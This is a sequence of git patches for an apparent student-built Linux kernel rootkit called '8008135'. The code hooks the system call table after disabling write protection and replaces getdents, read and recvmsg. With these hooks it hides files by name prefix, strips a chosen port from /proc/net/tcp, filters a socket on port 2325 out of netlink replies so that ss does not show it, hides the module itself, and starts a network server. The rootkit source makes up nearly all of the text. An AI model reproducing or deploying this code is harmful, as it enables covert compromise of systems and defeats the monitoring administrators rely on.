@@ -37,48 +32,39 @@ * RETURNS: int *******************************************************************************/ static int __init init_8008135(void) { - printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table); - - sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM]; - - printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig); + sys_getdents_orig = (sys_getdents_ptr)((void**)sys_call_table)[__NR_getdents]; + sys_read_orig = (sys_read_ptr)((void**)sys_call_table)[__NR_read]; - // turn write protect off wprotectionoff(); - - // add our new handlers - sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new; - - orig_read = (read_ptr)sys_call_table[__NR_read]; - - sys_call_table[READ_SYSCALL_NUM] = (unsigned long) hacked_read; - // turn write protect back on + sys_call_table[__NR_getdents] = sys_getdents_new; + sys_call_table[__NR_read] = sys_read_fake; + wprotectionon(); - printk(KERN_INFO "New syscall in place\n"); network_server_init(); hide_module(); - printk(KERN_INFO "Module hidden"); return 0; } /*** FUNCTION **************************************************************** * NAME: 8008135_exit -* DESCRIPTION: unloading Kernel Module +* DESCRIPTION: unloading Kernel Module, restoring the original system call table * PARAMETERS: - * RETURNS: - *******************************************************************************/ static void __exit exit_8008135(void) { + network_server_exit(); + wprotectionoff(); - sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig; - sys_call_table[READ_SYSCALL_NUM] = (unsigned long) orig_read; - // turn write protect back on + + sys_call_table[__NR_getdents] = sys_getdents_orig; + sys_call_table[__NR_read] = sys_read_orig; + wprotectionon(); - printk(KERN_INFO "Old syscall back\n"); } /*******************************************************************************/ From c897df31ec9d9bb3e44d321d13a88cbdd1adff05 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Sun, 8 Dec 2019 12:04:42 +0100 Subject: [PATCH 09/12] Dude, das war richtig schlecht geschriebener Code --- src/h1d3p0r7.c | 61 ++++++++++++++++++++++++++++++++------------------ 1 file changed, 39 insertions(+), 22 deletions(-) diff --git a/src/h1d3p0r7.c b/src/h1d3p0r7.c index f16e715..026f7b5 100644 --- a/src/h1d3p0r7.c +++ b/src/h1d3p0r7.c @@ -23,6 +23,11 @@ *******************************************************************************/ #include "h1d3p0r7.h" +/**** var ********************************************************************** +*******************************************************************************/ + +sys_read_ptr sys_read_orig; + /*******************************************************************************/ /*** FUNCTION **************************************************************** @@ -32,8 +37,8 @@ * RETURNS: *******************************************************************************/ -asmlinkage long hacked_read(unsigned int fd, char __user *buf, - size_t count) +asmlinkage long sys_read_fake(unsigned int fd, char __user *buf, + size_t count) { long result, bp, diff_in_bytes; char *kbuf, *start_line, *end_line, *port_num; @@ -43,47 +48,59 @@ asmlinkage long hacked_read(unsigned int fd, char __user *buf, struct path file_path; // run real read - result = (*orig_read)(fd,buf,count); - if (result <= 0) + result = (*sys_read_orig)(fd, buf, count); + + if (result <= 0){ return result; + } + - // get pathname - // CITATION [8] from report current_files = current->files; files_table = files_fdtable(current_files); file_path = files_table->fd[fd]->f_path; - pathname = d_path(&file_path,pbuf,256*sizeof(char)); - // if virtual file /proc/net/tcp - if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) { - // copy from user to kernelspace; - if (!access_ok(VERIFY_READ,buf,result)) + pathname = d_path(&file_path, pbuf, 256*sizeof(char)); + + + if (!strncmp(pathname, "/proc/", 6) && !strcmp(pathname + 10, "/net/tcp")) { + + if (!access_ok(VERIFY_READ, buf, result)){ return -1; - if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL) + } + if ((kbuf = kmalloc(result, GFP_KERNEL)) == NULL){ return -1; - if (copy_from_user(kbuf,buf,result)) + } + if (copy_from_user(kbuf, buf, result)){ return -1; + } + - // filter out hidden ports - start_line = strchr(kbuf,':') - 4; // skip first line + start_line = strchr(kbuf, ':') - 4; diff_in_bytes = (start_line - kbuf) * sizeof(char); + for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) { + start_line = kbuf + bp; - port_num = strchr(strchr(start_line,':') + 1,':') + 1; - end_line = strchr(start_line,'\n'); + port_num = strchr(strchr(start_line, ':') + 1, ':') + 1; + end_line = strchr(start_line, '\n'); diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char); - if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port - memmove(start_line,end_line + 1, // delete line in file - result - bp - diff_in_bytes); + + if (!strncmp(port_num, DEFAULT_PORT_HEX, 4)) { + + memmove(start_line, end_line + 1, + result - bp - diff_in_bytes); + result -= diff_in_bytes; } } // copy from kernel to userspace - if (!access_ok(VERIFY_WRITE,buf,result)) + if (!access_ok(VERIFY_WRITE, buf, result)){ return EINVAL; - if (copy_to_user(buf,kbuf,result)) + } + if (copy_to_user(buf, kbuf, result)){ return EINVAL; + } kfree(kbuf); } // return number of bytes read From 6ad05f1c20b0407084a3014c60aeb78b5faa7918 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Sun, 8 Dec 2019 12:05:07 +0100 Subject: [PATCH 10/12] OutSourcing --- src/headers/637d3n75.h | 40 +++++++++++++++++++++++++++++++++++-- src/headers/8008135.h | 37 +++++++++++----------------------- src/headers/h1d3m0dul3.h | 4 ++++ src/headers/h1d3p0r7.h | 33 +++++++++++++++++++++++++++--- src/headers/p463unpr073c7.h | 2 ++ 5 files changed, 86 insertions(+), 30 deletions(-) diff --git a/src/headers/637d3n75.h b/src/headers/637d3n75.h index feab7cf..26f8ff7 100644 --- a/src/headers/637d3n75.h +++ b/src/headers/637d3n75.h @@ -17,12 +17,48 @@ * with this program. If not, see . */ +/*******************************************************************************/ + + #ifndef SRC_HEADERS_637d3n75_H #define SRC_HEADERS_637d3n75_H -/**** var ******************************************************************** + +/**** include **************************************************************** *******************************************************************************/ -sys_getdents_t sys_getdents_orig = NULL; +#include +#include +#include +#include + +#include "5y563n.h" + +#define HIDE_PREFIX "8008135." +#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1) + +#define MODULE_NAME "8008135" +#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) + +#define __NR_getdents 78 + +/**** type ******************************************************************** +******************************************************************************/ + +struct linux_dirent { + unsigned long d_ino; + unsigned long d_off; + unsigned short d_reclen; + char d_name[1]; +}; + +typedef asmlinkage long (*sys_getdents_ptr)(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count); + +/*** var ******************************************************************** +*******************************************************************************/ + +extern sys_getdents_ptr sys_getdents_orig; extern asmlinkage long sys_getdents_new(unsigned int fd, diff --git a/src/headers/8008135.h b/src/headers/8008135.h index 99bc790..d6b5bef 100644 --- a/src/headers/8008135.h +++ b/src/headers/8008135.h @@ -18,16 +18,24 @@ */ #ifndef SRC_HEADERS_8008135_H #define SRC_HEADERS_8008135_H + /**** Includes *************************************************************** *******************************************************************************/ +#include "637d3n75.h" +#include "50ck3t.h" +#include "h1d3m0dul3.h" +#include "h1d3p0r7.h" +#include "p463unpr073c7.h" + +// To set module data #include +// To communicate kernel #include +/* #include -#include #include -#include -#include "5y563n.h" +#include #include #include #include @@ -36,18 +44,10 @@ #include #include #include - +*/ /**** Defines ***************************************************************** *******************************************************************************/ -#define GETDENTS_SYSCALL_NUM 78 -#define READ_SYSCALL_NUM 0 - -#define HIDE_PREFIX "8008135." -#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1) - -#define MODULE_NAME "8008135" -#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) /**** Modinfo **************************************************************** *******************************************************************************/ @@ -57,18 +57,5 @@ MODULE_AUTHOR("JanKoernerEnterprises"); MODULE_DESCRIPTION("8008135"); MODULE_VERSION("0.1"); -/**** type ******************************************************************* -*******************************************************************************/ -struct linux_dirent { - unsigned long d_ino; - unsigned long d_off; - unsigned short d_reclen; // d_reclen is the way to tell the length of this entry - char d_name[1]; // the struct value is actually longer than this, and d_name is variable width. -}; -typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, - struct linux_dirent __user *dirent, - unsigned int count); -typedef asmlinkage long (*read_ptr)(unsigned int fd, char __user *buf, - size_t count); #endif diff --git a/src/headers/h1d3m0dul3.h b/src/headers/h1d3m0dul3.h index 14182ae..f70db50 100644 --- a/src/headers/h1d3m0dul3.h +++ b/src/headers/h1d3m0dul3.h @@ -21,6 +21,10 @@ #define SRC_HEADERS_h1d3m0dul3_H +#include +#include + + extern void hide_module(void); #endif diff --git a/src/headers/h1d3p0r7.h b/src/headers/h1d3p0r7.h index 65ab39d..a9e8e8b 100644 --- a/src/headers/h1d3p0r7.h +++ b/src/headers/h1d3p0r7.h @@ -20,12 +20,39 @@ #ifndef SRC_HEADERS_h1d3p0r7_H #define SRC_HEADERS_h1d3p0r7_H + +/**** includes **************************************************************** +*******************************************************************************/ + #include "50ck3t.h" + +/* are those really all needed? */ +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +#define __NR_read 0 + + + +typedef asmlinkage long (*sys_read_ptr)(unsigned int fd, + char __user *buf, + size_t count); + + /**** var ********************************************************************** *******************************************************************************/ -read_ptr orig_read; -extern asmlinkage long hacked_read(unsigned int fd, char __user *buf, - size_t count) +extern sys_read_ptr sys_read_orig; + +extern asmlinkage long sys_read_fake(unsigned int fd, char __user *buf, + size_t count); #endif diff --git a/src/headers/p463unpr073c7.h b/src/headers/p463unpr073c7.h index a474e8f..c4aafb8 100644 --- a/src/headers/p463unpr073c7.h +++ b/src/headers/p463unpr073c7.h @@ -20,6 +20,8 @@ #ifndef SRC_HEADERS_p463unpr073c7_H #define SRC_HEADERS_p463unpr073c7_H +#include +#include "asm/special_insns.h" /**** defines ***************************************************************** *******************************************************************************/ From 7a486df14cdd82cbd9f0327f36bc5f6c91ee6774 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Sun, 8 Dec 2019 12:05:40 +0100 Subject: [PATCH 11/12] Updating gitignore and Makefile for new needs --- .gitignore | 4 ++-- Makefile | 5 +++-- 2 files changed, 5 insertions(+), 4 deletions(-) diff --git a/.gitignore b/.gitignore index 8359f9d..a0b166b 100644 --- a/.gitignore +++ b/.gitignore @@ -9,10 +9,10 @@ sysgen.h *.a *.ko *.o - +*5y563n.* *~ *.symvers *.order .tmp_versions/ *.cmd -.vscode/ \ No newline at end of file +.vscode/ diff --git a/Makefile b/Makefile index 1c688ae..7993ed2 100644 --- a/Makefile +++ b/Makefile @@ -19,14 +19,15 @@ INCL_H := $(PWD)/$(INCL_S)/headers obj-m += $(MNAME).o # Core $(MNAME)-y += src/$(MNAME).o -$(MNAME)-y += src/50ck3t.o $(MNAME)-y += src/637d3n75.o +$(MNAME)-y += src/50ck3t.o $(MNAME)-y += src/h1d3p0r7.o $(MNAME)-y += src/h1d3m0dul3.o $(MNAME)-y += src/p463unpr073c7.o +$(MNAME)-y += src/5y563n.o # Includes for header files etc -ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) +ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) -Wall all: $(shell $(SRCS_S)/cr3473_5y563n.sh) From 3e30a6df32ee4d5c3f374b26d9e2a694154bbd9c Mon Sep 17 00:00:00 2001 From: Jan Koerner Date: Sun, 8 Dec 2019 13:33:50 +0100 Subject: [PATCH 12/12] Socket von ss verstecken --- src/8008135.c | 3 ++ src/h1d3p0r7.c | 77 ++++++++++++++++++++++++++++++++++++++++++ src/headers/h1d3p0r7.h | 8 +++-- 3 files changed, 86 insertions(+), 2 deletions(-) diff --git a/src/8008135.c b/src/8008135.c index 851ce00..2484f63 100644 --- a/src/8008135.c +++ b/src/8008135.c @@ -35,11 +35,13 @@ static int __init init_8008135(void) { sys_getdents_orig = (sys_getdents_ptr)((void**)sys_call_table)[__NR_getdents]; sys_read_orig = (sys_read_ptr)((void**)sys_call_table)[__NR_read]; + sys_recvmsg_orig = (void *) sys_call_table[__NR_recvmsg]; wprotectionoff(); sys_call_table[__NR_getdents] = sys_getdents_new; sys_call_table[__NR_read] = sys_read_fake; + sys_call_table[__NR_recvmsg] = my_recvmsg_syscall; wprotectionon(); @@ -63,6 +65,7 @@ static void __exit exit_8008135(void) { sys_call_table[__NR_getdents] = sys_getdents_orig; sys_call_table[__NR_read] = sys_read_orig; + sys_call_table[__NR_recvmsg] = sys_recvmsg_orig; wprotectionon(); } diff --git a/src/h1d3p0r7.c b/src/h1d3p0r7.c index 026f7b5..5d16ec0 100644 --- a/src/h1d3p0r7.c +++ b/src/h1d3p0r7.c @@ -27,6 +27,7 @@ *******************************************************************************/ sys_read_ptr sys_read_orig; +original_recvmsg_syscall sys_recvmsg_orig; /*******************************************************************************/ @@ -106,3 +107,79 @@ asmlinkage long sys_read_fake(unsigned int fd, char __user *buf, // return number of bytes read return result; } + +/* Function that replaces the original `recvmsg` syscall. Initially, it calls the original + `recvmsg` which fills the given msg buffer. We realize whether we are reading from a netlink + socket with the help of some netlink utility macros. If a netlink socket is being used, we + iterate through the inet diag msg structs (each prepended by a nlmsghdr) and compare the + source and destination ports with our list of hidden ones. In order to hide an entry we copy + the remaining entries over it and adjust the data length which is returned to the user. */ + +asmlinkage ssize_t my_recvmsg_syscall(int sockfd, struct user_msghdr __user *msg, unsigned flags) +{ + long ret; + struct nlmsghdr *nlh; + long count; + int found; + char *stream; + int offset; + int i; + struct inet_diag_msg *r; + int port; + /* Call original `recvmsg` syscall */ + ret = sys_recvmsg_orig(sockfd, msg, flags); + + /* Some error occured. Don't do anything. */ + if (ret < 0) + return ret; + + /* Extract netlink message header from message */ + nlh = (struct nlmsghdr *)(msg->msg_iov->iov_base); + + /* Number of bytes remaining in message stream */ + count = ret; + + /* Set flag specifying whether message contains data to be masked */ + found = 1; + + /* NLMSG_OK: This macro will return true if a netlink message was received. It + essentially checks whether it's safe to parse the netlink message (if indeed + is a netlink message) using the other NLMSG_* macros. */ + while (NLMSG_OK(nlh, count)) { + + if (found == 0) + /* NLMSG_NEXT: Many netlink protocols have request messages that result + in multiple response messages. In these cases, multiple responses will + be copied into the `msg` buffer. This macro can be used to walk the + chain of responses. Returns NULL in the event the message is the last + in the chain for the given buffer. */ + nlh = NLMSG_NEXT(nlh, count); + + r = NLMSG_DATA(nlh); + port = ntohs(r->id.idiag_sport); + if(port == 2325){ + /* Message contains data to be masked */ + found = 1; + }else{ + found = 0; + continue; + } + + + stream = (char *) nlh; + + /* NLMSG_ALIGN: This macro accepts the length of a netlink message and rounds it + up to the nearest NLMSG_ALIGNTO boundary. It returns the rounded length. */ + offset = NLMSG_ALIGN((nlh)->nlmsg_len); + + /* Copy remaining entries over the data to be masked */ + for (i=0 ; i #include #include +#include /* Needed for ntohs */ #define __NR_read 0 - +#define __NR_recvmsg 47 typedef asmlinkage long (*sys_read_ptr)(unsigned int fd, char __user *buf, size_t count); +typedef asmlinkage ssize_t (*original_recvmsg_syscall)(int, struct user_msghdr __user *, unsigned); /**** var ********************************************************************** *******************************************************************************/ extern sys_read_ptr sys_read_orig; - extern asmlinkage long sys_read_fake(unsigned int fd, char __user *buf, size_t count); +extern original_recvmsg_syscall sys_recvmsg_orig; +extern asmlinkage ssize_t my_recvmsg_syscall(int, struct user_msghdr __user *, unsigned); + #endif